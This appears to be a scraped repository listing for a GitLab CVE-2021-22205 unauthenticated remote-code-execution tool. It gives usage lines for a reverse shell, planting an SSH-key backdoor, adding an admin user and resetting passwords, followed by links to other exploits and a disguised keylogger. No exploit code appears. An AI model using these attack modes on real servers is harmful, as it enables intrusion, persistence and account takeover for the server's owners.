GitLab CE/EE Preauth RCE using ExifTool

Related tags

Security related resourcesgitlabpentest-scriptscve-2021-22205preauth-rce
Overview

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3

Features

  • Gitlab version detection through the hash in Webpack manifest.json

  • Automatical out-of-band interactions with DNSLog & PostBin

  • Support Reverse Bash Shell / Append SSH Key to authorized_keys

  • Support ENTER to modify and restore gitlab user password

Usage

🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # 版本 & 漏洞探测
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # 命令执行 OOB 回显
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # 命令执行写文件回显
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # 反弹 SHELL
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # SSH 后门植入
    python3 CVE-2021-22205.py -u site_url -m add user pass # 添加管理用户
    python3 CVE-2021-22205.py -u site_url -m mod user      # 修改 user 密码 => [email protected]
    python3 CVE-2021-22205.py -u site_url -m rec user      # 还原 user 密码

Screenshot

Detect:

image-20211111130659726

RCE(Echo via PostBin OOB):

image-20211111132623307

Reverse Bash Shell:

image-20211111131442470

Append SSH Key to authorized_keys:

image-20211111133555010

Gitlab user password modification and restoration:

image-20211111132115090

Reference

Owner
3ND
3ND
GitHub Repository
ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF->GetWebShell)

ProxyLogon For Python3 ProxyLogon(CVE-2021-26855+CVE-2021-27065) Exchange Server RCE(SSRF-GetWebShell) usage: python ProxyLogon.py --host=exchang

112 Dec 01, 2022
an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to.

QAX A-Team 71 Nov 30, 2022
Um keylogger que se disfarça de um app que tira print da tela.

Keylogger_ Um keylogger que se disfarça de um app que tira print da tela. Este programa captura o print da tela e salva ,normalmente, na pasta Picture

Marcus Vinícius Ribeiro Andrade 1 Dec 03, 2021
Web Headers Security Scanner

Web Headers Security Scanner

Emre Koybasi 3 Dec 16, 2022
A simple way to store your passwords without requiring third party applications

SimplePasswordManager A simple way to store your passwords without requiring third party applications Simple To Use. Store Your Passwords For Each Web

Leone Odinga 1 Dec 23, 2021
Natas teaches the basics of serverside web-security.

over-the-wire-natas Natas teaches the basics of serverside web-security. Each level of natas consists of its own website located at http://natasX.nata

Siddhant Chouhan 1 Nov 27, 2021
Simple Dos-Attacker.

dos-attacker ❕ Atenção Não ataque sites privados. isto é illegal. 🖥️ Pré-requisitos Ultima versão do Python3. para verificar isto, é bem simples. Bas

Dio brando 10 Apr 15, 2022
Cobalt Strike < 4.4 dos CVE-2021-36798

CVE-2021-36798 CVE-2021-36798 Cobalt Strike 4.3 dos 用法 python3 CVE-2021-36798.py BeaconURL 打瘫Cobalt Strike 只需要一个包 已测试 4.3 4.2 参考: https://labs.sent

37 Nov 09, 2022
Generate your own NFTs and their metadata based on your desired probabilities.

Generate your own NFTs and their metadata based on your desired probabilities. Use your own art assets too! Perfect for use with Candy Machine.

hex 7 Sep 16, 2022
Ethereum transaction decoder (community version).

EthTx Community Edition Community version of EthTx transaction decoder Local environment For local instance, you need few things: Depending on your di

240 Dec 21, 2022
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Abdallah Elshinbary 48 Dec 19, 2022
Python & JavaScript Obfuscator made in Python 3.

Python Code Obfuscator A script that converts code into full on random numerical expressions. Simple Scripts: Python Mode... Input: Function that deco

rzx. 1 Dec 29, 2021
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
Yesitsme - Simple OSINT script to find Instagram profiles by name and e-mail/phone

Simple OSINT script to find Instagram profiles by name and e-mail/phone

108 Jan 07, 2023
exchange-ssrf-rce

Usage python3 .\exchange-exp.py -------------------------------------------------------------------------------- |

Jen 76 Nov 09, 2022
A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o

2 Nov 09, 2022
A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask.

PWInput A cross-platform Python module that displays **** for password input. Works on Windows, unlike getpass. Formerly called stdiomask. Installatio

Al Sweigart 26 Sep 04, 2022
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
Installation of hacking tools

Tools-Spartan This is a program that makes it easy for you to download and install tools used in Kali Linux, there are tons of tools available.

1 Nov 10, 2021
Discord exploit allowing you to be unbannable.

Discord-Ban-Immunity Discord exploit allowing you to be unbannable. 9/3/2021 Found in late August. Found by Passive and Me. Explanation If a user gets

orlando 9 Nov 23, 2022